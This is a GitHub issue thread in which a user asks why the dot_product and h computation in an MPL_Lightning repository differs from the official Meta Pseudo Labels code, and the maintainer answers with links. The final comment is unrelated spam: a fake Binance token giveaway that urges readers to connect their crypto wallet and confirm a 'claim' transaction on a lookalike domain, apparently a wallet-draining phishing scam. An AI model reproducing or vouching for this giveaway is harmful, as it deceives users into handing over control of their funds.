### ISSUE TITLE
dot_product in your code

### ISSUE THREAD

**Issue by ghost** [ifsheldon/MPL_Lightning#1]
Dear ifsheldon,

I would like to start by thanking you for creating legible MPL repo. Your work has been invaluable in advancing the field of computer vision, and I am truly grateful for your contributions.
I am writing to ask you one question about dot_product in your code: 
![image](https://user-images.githubusercontent.com/101374081/219877289-60b0702c-3484-4979-a983-4eb650429f3e.png)
But in official implementation of MPL, h is computed by:
![image](https://user-images.githubusercontent.com/101374081/219877378-3138a40d-4999-4215-8ab2-8484023724e6.png)
which means h = L_S_new - L_S_old 
And this is my writing of h:
![image](https://user-images.githubusercontent.com/101374081/219877447-41d2fb32-de6b-4715-88fc-1e51515b7086.png)
Seem like we have the same idea. But why is it different from author's ? 
If you figured it out, please inform me. Thank you so much.

**Comment by ifsheldon** [comment]
yeah....... Things get awkward. See [here](https://github.com/kekmodel/MPL-pytorch/blob/f84e8df869d8fc2e1248740bf6e7bf3017e7b680/main.py#L223) from MPL-PyTorch and its [related issue](https://github.com/kekmodel/MPL-pytorch/issues/6). According to this [issue](https://github.com/kekmodel/MPL-pytorch/issues/37), it turns out the MPL does not matter much.

**Comment by fede-s** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)
